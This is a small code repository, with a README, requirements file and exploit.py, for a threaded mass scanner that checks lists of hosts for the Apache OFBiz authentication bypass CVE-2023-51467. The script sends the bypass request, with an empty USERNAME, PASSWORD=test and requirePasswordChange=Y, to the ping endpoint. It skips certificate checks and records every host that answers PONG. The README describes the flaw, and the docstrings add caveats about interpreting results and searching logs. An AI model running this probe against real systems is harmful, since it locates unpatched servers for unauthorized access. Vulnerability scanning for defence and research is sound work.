├── requirements.txt ├── README.md └── exploit.py /requirements.txt: -------------------------------------------------------------------------------- 1 | alive_progress==3.1.4 2 | requests==2.25.1 3 | rich==13.7.0 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-51467 Scanner 🕵️‍♂️ 2 | 3 | ## Description 📜 4 | 5 | CVE-2023-51467 Scanner is a Python-based command-line tool 🛠️ that scans URLs for a specific vulnerability in the Apache OFBiz ERP system. This zero-day security flaw, tracked as CVE-2023-51467, allows attackers to bypass authentication protections due to an incomplete patch for the critical vulnerability CVE-2023-49070. 6 | 7 | ## Vulnerability Details 🔐 8 | 9 | The CVE-2023-51467 vulnerability resides in the login functionality of Apache OFBiz versions prior to 18.12.10. It can be exploited by sending an HTTP request with empty or invalid USERNAME and PASSWORD parameters, which results in an authentication success message, allowing unauthorized access to internal resources. 10 | 11 | ## Installation 💻 12 | 13 | To use the CVE-2023-51467 Scanner, you need Python 3.x. 14 | 15 | You can install the required packages using `pip` 📦: 16 | 17 | ```shell 18 | pip install -r requirements.txt 19 | ``` 20 | 21 | ## Usage 🚀 22 | 23 | To scan a single URL 🎯: 24 | 25 | ```shell 26 | python exploit.py -u http://example.com 27 | ``` 28 | 29 | To scan a list of URLs from a file 📊: 30 | 31 | ```shell 32 | python exploit.py -f urls.txt -o output.txt -t 50 33 | ``` 34 | 35 | ## Options ⚙️ 36 | 37 | - `-u`, `--url`: Single URL to send the GET request to 🌐. 38 | - `-f`, `--file`: File containing a list of base URLs to scan 📄. 39 | - `-o`, `--output`: File to write vulnerable systems to (default is `output.txt`) 📝. 40 | - `-t`, `--threads`: Number of concurrent threads to use (default is 10) 🧵. 
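# README.md (continued)
#
# ## Disclaimer ⚠️
#
# This tool is intended for security research and should not be used for illegal activities. The authors of this tool cannot be held responsible for any misuse or damage from its use.
#
# --------------------------------------------------------------------------------
# /exploit.py:
# --------------------------------------------------------------------------------
"""Threaded checker for the CVE-2023-51467 authentication bypass.

For every base URL the script first confirms the host answers at all, then
sends one GET to ``/webtools/control/ping`` with an empty ``USERNAME``,
``PASSWORD=test`` and ``requirePasswordChange=Y``.  A 200 response whose body
contains ``PONG`` is reported and the host's ``scheme://netloc`` is appended
to the output file.

Notes for anyone interpreting the results:

* The match is a substring test on a response that may have followed
  redirects, so a hit is an indicator to confirm, not proof.
* A host that is not reported has not been shown to be patched: the
  reachability check or the probe itself may simply have failed.
* The request line above is what appears in a server's access log when this
  check runs, which makes it a usable search term for log review.
"""
import os
import argparse
import requests
import concurrent.futures

from threading import Lock
from rich.console import Console
from typing import List, Optional
from urllib.parse import urlparse
from alive_progress import alive_bar
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Every request below is made with verify=False, so server certificates are
# never validated and responses are not authenticated; this line only hides
# the warning urllib3 would otherwise print for each such request.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
console = Console()

# Upper bound on how much of a remote response body is echoed to the terminal.
_MAX_LOGGED_RESPONSE_CHARS = 200


class CVE_2023_51467:
    """Check a list of base URLs for the CVE-2023-51467 ping-endpoint response.

    Args:
        urls: Base URLs (with or without a scheme) to check.
        threads: Size of the worker thread pool used by :meth:`run`.
        output_file: Path that matching hosts are appended to.
    """

    def __init__(self, urls: List[str], threads: int, output_file: str):
        self.urls = urls
        self.threads = threads
        self.output_file = output_file
        # Serialises appends to the output file across worker threads.
        self.file_lock = Lock()

    def check_url(self, base_url: str) -> Optional[str]:
        """Return the first reachable form of ``base_url``, or ``None``.

        When ``base_url`` carries no scheme, ``http`` is tried before
        ``https``.  Only scheme, netloc and path are kept; any query string
        or fragment in the input is dropped.
        """
        parsed_url = urlparse(base_url)
        schemes = [parsed_url.scheme] if parsed_url.scheme else ["http", "https"]
        for scheme in schemes:
            url = f"{scheme}://{parsed_url.netloc}{parsed_url.path}"
            if self.is_url_accessible(url):
                return url
        return None

    def is_url_accessible(self, url: str) -> bool:
        """Return True when a HEAD request to ``url`` yields a status below 500.

        Redirects are followed, certificates are not verified, and any
        ``requests.RequestException`` (timeout, refused connection, bad URL)
        counts as "not accessible".
        """
        try:
            response = requests.head(url, verify=False, timeout=5, allow_redirects=True)
        except requests.RequestException:
            return False
        return response.status_code < 500

    def scan_url(self, base_url: str):
        """Probe one base URL and record it if the ping endpoint answers PONG.

        The reachability check runs inside the ``try`` as well: ``run`` never
        reads the futures' results, so an exception raised outside it (for
        example ``ValueError`` from ``urlparse`` on a malformed entry) would
        otherwise disappear without any log line.
        """
        try:
            target_url = self.check_url(base_url)
            if not target_url:
                return

            response = requests.get(
                f"{target_url}/webtools/control/ping?USERNAME&PASSWORD=test&requirePasswordChange=Y",
                verify=False,
                timeout=10,
                allow_redirects=True,
            )

            # Substring match after redirects: any 200 page containing "PONG"
            # is reported, so confirm a hit before acting on it.
            if response.status_code == 200 and "PONG" in response.text:
                # The body is controlled by the remote host.  Log a bounded,
                # repr-escaped excerpt and disable rich markup so it cannot
                # restyle or flood the operator's terminal.
                snippet = response.text.strip()[:_MAX_LOGGED_RESPONSE_CHARS]
                console.log(
                    f"Vulnerable URL found: {base_url}, Response: {snippet!r}",
                    markup=False,
                )
                parsed_target = urlparse(target_url)
                vulnerable_url = f"{parsed_target.scheme}://{parsed_target.netloc}\n"
                with self.file_lock:
                    with open(self.output_file, "a", encoding="utf-8") as file:
                        file.write(vulnerable_url)
        except Exception as e:
            console.log(f"Error scanning {base_url}: {e}", markup=False)

    def run(self):
        """Scan every URL on a thread pool, advancing a progress bar per result."""
        with alive_bar(len(self.urls), enrich_print=False) as bar:
            with concurrent.futures.ThreadPoolExecutor(
                max_workers=self.threads
            ) as executor:
                future_to_url = {
                    executor.submit(self.scan_url, url): url for url in self.urls
                }
                for _ in concurrent.futures.as_completed(future_to_url):
                    bar()


def main():
    """Parse the command line, build the URL list and run the scanner."""
    script_name = os.path.basename(__file__)
    parser = argparse.ArgumentParser(
        description="CVE-2023-51467 Scanner: Scans URLs for a specific vulnerability associated with CVE-2023-51467.",
        epilog=f"Example usage:\n"
        f"  python {script_name} -u http://example.com\n"
        f"  python {script_name} -f urls.txt -o output.txt -t 50",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("-u", "--url", help="Single URL to send GET request to")
    parser.add_argument(
        "-f", "--file", help="File containing list of base URLs to scan"
    )
    parser.add_argument(
        "-o",
        "--output",
        default="output.txt",
        help="File to write vulnerable systems to",
    )
    parser.add_argument(
        "-t",
        "--threads",
        type=int,
        default=10,
        help="Number of concurrent threads to use",
    )
    args = parser.parse_args()

    urls = []
    if args.file:
        with open(args.file, "r", encoding="utf-8") as file:
            # Blank lines are not targets; without the filter each one is
            # scheduled, probed as an empty host and counted in the progress bar.
            urls = [entry for entry in (line.strip() for line in file) if entry]
    elif args.url:
        urls.append(args.url)
    else:
        console.log("No URL or file provided")
        return

    scanner = CVE_2023_51467(urls, args.threads, args.output)
    scanner.run()


if __name__ == "__main__":
    main()
# --------------------------------------------------------------------------------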